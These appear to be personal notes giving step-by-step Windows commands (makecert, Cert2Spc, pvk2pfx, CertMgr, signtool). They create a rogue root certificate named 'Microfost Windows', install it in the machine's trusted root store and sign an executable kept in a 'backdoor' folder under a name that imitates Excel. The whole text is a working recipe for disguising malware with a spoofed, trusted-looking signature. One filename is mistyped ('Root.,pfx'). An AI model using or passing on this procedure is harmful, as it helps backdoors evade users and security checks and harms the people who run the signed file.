Generate a self-signed root certificate
makecert -n "CN=Microfost Windows" -r -sv Root.pvk Root.cer
This command uses the makecert tool to create a self-signed root certificate with the certificate name set to "Microfost Windows" and saves the private key to Root.pvk and the public certificate to Root.cer.
Convert the certificate to a Software Distribution Certificate (SPC):
Cert2Spc.exe Root.cer Root.spc
Use the Cert2Spc tool to convert the certificate you just created into a software distribution certificate and save it to Root.spc
Combine the private key and SPC into a PFX file:
pvk2pfx.exe -pvk Root.pvk -pi timmy -spc Root.spc -pfx Root.,pfx -f
Use the pvk2pfx tool to combine the private key (Root.pvk) and SPC (Root.spc) into a PFX file, set the password to "timmy", and save the result to Root.pfx.
Add the certificate to the local computer's trusted root certificate store
CertMgr.Exe -add -c Root.cer -s -r localmachine root
Use the CertMgr tool to add the certificate Root.cer to the local computer's trusted root certificate storage
Signing executable files using PFX files
signtool.exe sign /f Root.pfx /p timmy C:\Users\qoo7972365\Desktop\backdoor\windows_amd_excel.exe
Use the signtool tool and the PFX file just created (password is "timmy") to sign the specified executable file.